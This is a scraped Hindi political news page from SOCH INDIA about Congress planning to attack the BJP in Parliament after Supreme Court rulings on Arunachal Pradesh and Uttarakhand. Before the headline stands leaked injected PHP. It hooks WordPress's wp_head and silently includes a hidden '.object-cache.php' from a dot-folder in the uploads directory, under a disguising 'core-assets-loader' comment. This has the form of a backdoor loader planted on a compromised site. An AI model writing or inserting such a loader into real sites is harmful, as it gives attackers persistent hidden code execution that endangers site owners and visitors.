add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); तैयारी पूरी, उत्तराखंड और अरुणाचल पर अब संसद में भाजपा को घेरेगी कांग्रेस – SOCH INDIA
Menu

राजनीति
तैयारी पूरी, उत्तराखंड और अरुणाचल पर अब संसद में भाजपा को घेरेगी कांग्रेस

nobanner

सोनिया राहुलPC: PTI

संवैधानिक संकट से जूझ रहे अरुणाचल प्रदेश में सुप्रीम कोर्ट से सरकार बहाली का आदेश कांग्रेस के लिए संजीवनी माना जा रहा है। वहीं उत्तराखंड के बाद दूसरी बार केंद्र सरकार के निर्णय को न्यायपालिका के पलटने को भाजपा के लिए झटके पर झटके के तौर पर राजनीतिक गलियारों में देखा जा रहा है।

उत्साहित कांग्रेस की अध्यक्षा, सोनिया गांधी, उपाध्यक्ष राहुल गांधी और पार्टी ने एक साथ इस मुद्दे पर केंद्र सरकार पर बुधवार को हमला बोला। बुलंद हौसले के साथ कांग्रेस ने 18 जुलाई से झुरू होने वाले संसद के मानसून सत्र में भी केंद्र सरकार को घेरने की रणनीति तैयार की है।

उत्तराखंड की कांग्रेस सरकार की जगह लगाए गए राष्ट्रपति को दो माह पहले मई में ही सुप्रीम कोर्ट ने गैरसंवैधानिक करार दे दिया था। वहां कांग्रेस की सरकार बहाल हो गई थी। भाजपा ने राजनीतिक उथल पुथल केबीच अपनी सरकार बनाने की भी कोशिश की थी।